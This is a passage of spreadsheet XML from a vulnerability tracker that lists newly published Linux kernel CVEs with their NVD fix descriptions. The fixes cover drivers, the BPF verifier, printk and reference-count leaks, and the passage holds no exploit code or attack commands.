      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr"/>
      <c r="L940" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q940" s="5" t="inlineStr"/>
      <c r="R940" s="5" t="inlineStr"/>
      <c r="S940" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: asus-wireless: Fail probe when there is no ACPI match
Every platform driver can be forced to match a device that does not match
its list of device IDs because of device_match_driver_override(), so
platform drivers that rely on the existence of a device ACPI companion
object need to verify its presence.
asus_wireless_probe() returns success when acpi_match_acpi_device()
finds no match, leaving behind an input device that never reports
anything because the notify handler is not installed.  Worse, when the
driver is force-bound to a device without an ACPI companion, probe
still succeeds and stores a NULL companion pointer, which
asus_wireless_remove() later passes to acpi_dev_remove_notify_handler(),
leading to a NULL pointer dereference on unbind.
Return -ENODEV when the device does not match the ID table.  This also
covers the missing-companion case, because acpi_match_acpi_device()
rejects a NULL device.  Perform the check before allocating any driver
state, instead of after the input device has already been registered.</t>
        </is>
      </c>
      <c r="T940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93124</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93125</t>
        </is>
      </c>
      <c r="D941" s="5" t="inlineStr"/>
      <c r="E941" s="5" t="inlineStr"/>
      <c r="F941" s="5" t="inlineStr"/>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="inlineStr"/>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr"/>
      <c r="L941" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q941" s="5" t="inlineStr"/>
      <c r="R941" s="5" t="inlineStr"/>
      <c r="S941" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject rdonly/rdwr_buf_size kfunc arguments that exceed u32 max
check_kfunc_args() detects a kfunc argument named rdonly_buf_size or
rdwr_buf_size and stores reg-&gt;var_off.value into meta-&gt;r0_size, a u64,
and does not bound it. check_kfunc_call() later copies that value into
the returned register's mem_size field:
  meta-&gt;r0_size = reg-&gt;var_off.value;
  ...
  regs[BPF_REG_0].mem_size = meta.r0_size;
regs[BPF_REG_0].mem_size is u32. A constant whose upper 32 bits are set
gets truncated instead of causing a load-time rejection, so the verifier
records a PTR_TO_MEM register with an approximately 4 GiB mem_size for
whatever allocation the kfunc returned. A later access check against
that register uses the truncated, wrong bound.
Reject rdonly_buf_size/rdwr_buf_size values that exceed U32_MAX at the
point meta-&gt;r0_size is set.</t>
        </is>
      </c>
      <c r="T941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93125</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93126</t>
        </is>
      </c>
      <c r="D942" s="5" t="inlineStr"/>
      <c r="E942" s="5" t="inlineStr"/>
      <c r="F942" s="5" t="inlineStr"/>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="inlineStr"/>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr"/>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q942" s="5" t="inlineStr"/>
      <c r="R942" s="5" t="inlineStr"/>
      <c r="S942" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
remoteproc: qcom_q6v5_adsp: Fix reference leak for device node
When calling of_parse_phandle_with_args(), the caller is responsible
to call of_node_put() to release the reference of device node.
In adsp_map_carveout, it does not release the reference.</t>
        </is>
      </c>
      <c r="T942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93126</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93127</t>
        </is>
      </c>
      <c r="D943" s="5" t="inlineStr"/>
      <c r="E943" s="5" t="inlineStr"/>
      <c r="F943" s="5" t="inlineStr"/>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="inlineStr"/>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr"/>
      <c r="L943" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q943" s="5" t="inlineStr"/>
      <c r="R943" s="5" t="inlineStr"/>
      <c r="S943" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Drop scalar id on sign-extending narrowing stack fills
When a spilled scalar is filled back with a sign-extending narrowing load
(BPF_MEMSX), check_stack_read_fixed_off() copies the spilled register
including its scalar id, but coerce_reg_to_size_sx() then sign-extends the
filled register's value. If the same slot is also filled with a plain
zero-extending load (BPF_MEM), both destination registers share the id yet
hold different values. A later 'if &lt;zext-reg&gt; == const' then refines the
sign-extended register through sync_linked_regs() to a value it does not
have at runtime (e.g. the verifier believes 0x80000000 while the register
is 0xffffffff80000000), which can be turned into an out-of-bounds access.
Drop the shared scalar id at the sign-extension site in check_mem_access()
when sign extension actually changes the value, mirroring the BPF_MOVSX
handling in check_alu_op() (no_sext = reg_umax &lt; 2^(size*8-1)).</t>
        </is>
      </c>
      <c r="T943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93127</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93128</t>
        </is>
      </c>
      <c r="D944" s="5" t="inlineStr"/>
      <c r="E944" s="5" t="inlineStr"/>
      <c r="F944" s="5" t="inlineStr"/>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="inlineStr"/>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr"/>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q944" s="5" t="inlineStr"/>
      <c r="R944" s="5" t="inlineStr"/>
      <c r="S944" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: lg-laptop: Fix LED resource handling
The event notification callback might access kbd_backlight even
when it was not successfully registered with the LED subsystem.
The same happens inside acpi_remove(), where the LED devices are
unregistered unconditionally.
Fix this by tracking the availability of the kbd_backlight LED
device and use devm_led_classdev_register() to let devres take
care of unregistering the LED devices during removal. For this
the parent device of the LED devices is changed to the native
platform device.</t>
        </is>
      </c>
      <c r="T944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93128</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93129</t>
        </is>
      </c>
      <c r="D945" s="5" t="inlineStr"/>
      <c r="E945" s="5" t="inlineStr"/>
      <c r="F945" s="5" t="inlineStr"/>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="inlineStr"/>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr"/>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q945" s="5" t="inlineStr"/>
      <c r="R945" s="5" t="inlineStr"/>
      <c r="S945" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: dell-wmi-base: Fix handling of ultra performance key
The commit message of commit 5fbd827eb9c2 ("platform/x86: dell-wmi: Recognise or support new switches")
states that the ultra performance key contains additional data
after the type and code fields. The event data passed to
dell_wmi_process_key() is already parsed, so "buffer" already
starts after those two fields.
Use the correct index for accessing the first data field to avoid
a potential buffer overread.</t>
        </is>
      </c>
      <c r="T945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93129</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93130</t>
        </is>
      </c>
      <c r="D946" s="5" t="inlineStr"/>
      <c r="E946" s="5" t="inlineStr"/>
      <c r="F946" s="5" t="inlineStr"/>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="inlineStr"/>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr"/>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q946" s="5" t="inlineStr"/>
      <c r="R946" s="5" t="inlineStr"/>
      <c r="S946" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: dell-wmi-base: Fix resource leak on module load failure
We need to properly clean up the SMBIOS request and the privacy driver
when the module load fails.</t>
        </is>
      </c>
      <c r="T946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93130</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93131</t>
        </is>
      </c>
      <c r="D947" s="5" t="inlineStr"/>
      <c r="E947" s="5" t="inlineStr"/>
      <c r="F947" s="5" t="inlineStr"/>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="inlineStr"/>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr"/>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q947" s="5" t="inlineStr"/>
      <c r="R947" s="5" t="inlineStr"/>
      <c r="S947" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: dell-privacy: Fix race condition
Accessing priv-&gt;features_present needs to happen with the list mutex
being held, otherwise priv can be freed at any moment.</t>
        </is>
      </c>
      <c r="T947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93131</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93132</t>
        </is>
      </c>
      <c r="D948" s="5" t="inlineStr"/>
      <c r="E948" s="5" t="inlineStr"/>
      <c r="F948" s="5" t="inlineStr"/>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="inlineStr"/>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr"/>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q948" s="5" t="inlineStr"/>
      <c r="R948" s="5" t="inlineStr"/>
      <c r="S948" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: RISC-V: Fix riscv_acpi_add_prt_dep() loop handling
The loop in riscv_acpi_add_prt_dep() includes error conditions that are
handled in a dubious - if not outright wrong - way, by continuining the
loop (which skips and misses the entry pointer update to point to the next
entry).
Rewrite the loop as a for loop (that handles the continuation correctly)
and wrap the condition and update statements using helper functions to make
it cleaner.</t>
        </is>
      </c>
      <c r="T948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93132</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93133</t>
        </is>
      </c>
      <c r="D949" s="5" t="inlineStr"/>
      <c r="E949" s="5" t="inlineStr"/>
      <c r="F949" s="5" t="inlineStr"/>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="inlineStr"/>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr"/>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q949" s="5" t="inlineStr"/>
      <c r="R949" s="5" t="inlineStr"/>
      <c r="S949" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: RISC-V: Check acpi_get_handle() status in riscv_acpi_add_prt_dep()
In riscv_acpi_add_prt_dep(), the acpi_get_handle() call can fail which
would leave link_handle uninitialized.
Fix it by checking the acpi_get_handle() return status and skip the entry
if it fails.</t>
        </is>
      </c>
      <c r="T949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93133</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93134</t>
        </is>
      </c>
      <c r="D950" s="5" t="inlineStr"/>
      <c r="E950" s="5" t="inlineStr"/>
      <c r="F950" s="5" t="inlineStr"/>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="inlineStr"/>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr"/>
      <c r="L950" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q950" s="5" t="inlineStr"/>
      <c r="R950" s="5" t="inlineStr"/>
      <c r="S950" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
printk: Fix possible console use-after-free
When emitting a record via legacy printing, it is possible that a handover
to another legacy printing context occurs. When a context has performed a
handover, the console SRCU read lock is released and the pointer to the
console struct might now be invalid. Therefore, after calling
nbcon_legacy_emit_next_record() or console_emit_next_record(), it is
necessary to check if a handover occurred _before_ further @con usage.
Sashiko pointed out that console_flush_one_record() was not doing this.
In console_flush_one_record(), after emitting a record, move the further
usage of @con after the handover check.</t>
        </is>
      </c>
      <c r="T950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93134</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93135</t>
        </is>
      </c>
      <c r="D951" s="5" t="inlineStr"/>
      <c r="E951" s="5" t="inlineStr"/>
      <c r="F951" s="5" t="inlineStr"/>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="inlineStr"/>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr"/>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q951" s="5" t="inlineStr"/>
      <c r="R951" s="5" t="inlineStr"/>
      <c r="S951" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject programs with inlined helpers if JIT is not available
When an architecture (such as LoongArch, ARM64, and RISC-V) implements
bpf_jit_inlines_helper_call(), the verifier skips rewriting the helper
call offset (insn-&gt;imm) in bpf_do_misc_fixups(). This is because the
helper is expected to be inlined by the JIT compiler later. Therefore,
insn-&gt;imm remains as the raw helper enum ID.
However, if JIT is disabled at runtime (net.core.bpf_jit_enable=0) or
if JIT compilation fails dynamically (e.g., due to OOM), the program
falls back to the BPF interpreter.
When the interpreter executes (__bpf_call_base + insn-&gt;imm) with the
unpatched raw ID, it jumps into an invalid address space, triggering
an instruction alignment fault or a kernel panic.
Although these helpers have valid C implementations in the kernel, the
omission of offset rewriting makes runtime interpreter fallback fatal.
Fix this by setting 'prog-&gt;jit_required = 1' when helper call rewriting
is skipped for JIT inlining. This ensures that such programs are safely
rejected if JIT is not available, preventing the runtime kernel panic.</t>
        </is>
      </c>
      <c r="T951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93135</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93136</t>
        </is>
      </c>
      <c r="D952" s="5" t="inlineStr"/>
      <c r="E952" s="5" t="inlineStr"/>
      <c r="F952" s="5" t="inlineStr"/>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="inlineStr"/>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr"/>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q952" s="5" t="inlineStr"/>
      <c r="R952" s="5" t="inlineStr"/>
      <c r="S952" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bus: mhi: ep: Fix device refcount leak in the error path of MHI device creation
mhi_ep_create_device() takes one device reference for the UL channel and
another for the DL channel after allocating the transfer device. These
references are normally released by mhi_ep_destroy_device() before the
device itself is removed.
If dev_set_name() or device_add() fails, the error path currently drops
only one reference. The remaining channel references keep the device
from being released and leave the channels associated with a device that
was never registered.
Route both failures through a common unwind path that drops the DL
channel reference, the UL channel reference, and the initial reference
from device_initialize().</t>
        </is>
      </c>
      <c r="T952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93136</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93137</t>
        </is>
      </c>
      <c r="D953" s="5" t="inlineStr"/>
      <c r="E953" s="5" t="inlineStr"/>
      <c r="F953" s="5" t="inlineStr"/>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="inlineStr"/>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr"/>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q953" s="5" t="inlineStr"/>
      <c r="R953" s="5" t="inlineStr"/>
      <c r="S953" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix use-after-free on mm_struct in bpf_find_vma()
bpf_find_vma() reads task-&gt;mm and calls mmap_read_trylock(mm) without
holding a reference on the mm. On a foreign task, a concurrent exit_mm()
can free the mm_struct between the lockless read and the trylock,
resulting in a use-after-free. mm_struct is not SLAB_TYPESAFE_BY_RCU.
For the current task, task-&gt;mm is stable. For a foreign task, pin the mm
under task-&gt;alloc_lock and release it with mmput_async(), mirroring commit
d8e27d2d22b6 ("bpf: fix mm lifecycle in open-coded task_vma iterator").
Use spin_trylock() instead of get_task_mm() so BPF context does not block
on alloc_lock. Reject irqs-disabled contexts and !CONFIG_MMU on the
foreign-task path because dropping the mm reference is not safe there.
Race:
  CPU0 (BPF program)                  CPU1 (exiting task)
  ============================        ==========================
  bpf_find_vma(foreign_task):
    mm = task-&gt;mm
                                      exit_mm():
                                        task-&gt;mm = NULL
                                        mmput(mm) -&gt; frees mm_struct
    mmap_read_trylock(mm)
        // UAF on mm</t>
        </is>
      </c>
      <c r="T953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93137</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93138</t>
        </is>
      </c>
      <c r="D954" s="5" t="inlineStr"/>
      <c r="E954" s="5" t="inlineStr"/>
      <c r="F954" s="5" t="inlineStr"/>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="inlineStr"/>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr"/>
      <c r="K954" s="5" t="inlineStr"/>
      <c r="L954" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q954" s="5" t="inlineStr"/>
      <c r="R954" s="5" t="inlineStr"/>
      <c r="S954" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix vmlinux BTF prep race in bpf_get_btf_vmlinux
bpf_get_btf_vmlinux() lazily parses the vmlinux BTF under the
bpf_verifier_lock, but publishes the result through a plain store
and re-checks it through a plain lockless load. Nothing orders
the stores initializing the struct btf inside btf_parse_vmlinux()
against the store publishing the pointer: On a weakly ordered
arch, a concurrent first-time caller taking the lockless fast
path could in principle observe the pointer before the parsed
contents are visible. The mutex_unlock() does not help such a
reader given it only synchronizes with a later acquisition of the
same lock. Thus, publish the pointer with smp_store_release()
and read it on the fast path with smp_load_acquire().
Acquire semantics are needed rather than a dependency-ordered
READ_ONCE(): btf_parse_vmlinux() also populates globals outside
the returned object (e.g. bpf_ctx_convert.t). An address
dependency would only order accesses performed through the
pointer and not cover other globals.</t>
        </is>
      </c>
      <c r="T954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93138</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93139</t>
        </is>
      </c>
      <c r="D955" s="5" t="inlineStr"/>
      <c r="E955" s="5" t="inlineStr"/>
      <c r="F955" s="5" t="inlineStr"/>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="inlineStr"/>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr"/>
      <c r="L955" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q955" s="5" t="inlineStr"/>
      <c r="R955" s="5" t="inlineStr"/>
      <c r="S955" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/mes: Fix hung_queue_db_array loop limit for multi-XCC
